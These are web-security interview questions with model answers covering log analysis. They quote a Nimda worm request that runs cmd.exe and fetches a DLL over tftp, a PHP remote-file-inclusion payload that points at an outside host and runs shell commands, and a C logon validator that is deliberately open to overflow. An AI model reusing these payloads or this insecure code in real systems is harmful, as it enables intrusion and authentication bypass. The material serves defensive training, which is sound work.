Computer security

Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/

cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"

68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/

cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:httpodbc.dll HTTP/1.0" 200 566 "-" "-"

Note: Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================

Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743

Handler: cgi-script

----------------------------------------

POST /index.php HTTP/1.1

Host: www.foo.com

Connection: keep-alive

Accept: */*

Accept-Language: en-us

Content-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla 4.0 (Linux)

Content-Length: 65

X-Forwarded-For: 200.158.8.207

mod_security-message: Access denied with code 403. Pattern match "unamex20-a" at POST_PAYLOAD

mod_security-action: 403

65

lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

----------------------------------------

Note: Goal of question – to verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the command. This attack was not successful for the following two reasons:

· The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname –a" data in the POST PAYLOAD.

· The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.

You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this –

"GET /cgi-bin/logon_validate?login=test&password=test"

The source code is shown below –

void show_error(void) {

// AUTHENTICATION ERROR

exit(-1);

}

int main(int argc, char **argv) {

char error_on_auth='1';

char user[128];

char pass[128];

char *ch_ptr_begin;

char *ch_ptr_end;

/**********************************/

/* Get Username from Query String */

/**********************************/

ch_ptr_begin=(char *)strstr

(****QUERY_STRING****,"login=");

if (ch_ptr_begin==NULL)

show_error();

ch_ptr_begin+=6;

ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");

if (ch_ptr_end==NULL)

show_error();

*(ch_ptr_end++)='';

strcpy(user,ch_ptr_begin);

/**********************************/

/* Get Password from Query String */

/**********************************/

ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");

if (ch_ptr_begin==NULL)

show_error();

ch_ptr_begin+=9;

ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");

if (ch_ptr_end!=NULL) *(ch_ptr_end++)='';

strcpy(pass,ch_ptr_begin);

if ((strcmp(user,GOOD_USER)==0) &&

(strcmp(pass,GOOD_PASS)==0))

error_on_auth='0';

if (error_on_auth=='0') {

// AUTHENTICATION OK!!

} else {

// AUTHENTICATION ERROR

show_error();

}

// return(0); hehe could be evil ;PPPPP

exit(0);

}

This pseudo-code is taken from the NGSec Web Auth Games

http://quiz.ngsec.biz:8080/game1/level6/replicant.php

Do you see any problems with this script?

How could an attacker exploit this script to bypass

the authentication mechanisms in this script?

What are some mitigation options?

Note: Goal of question – This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives.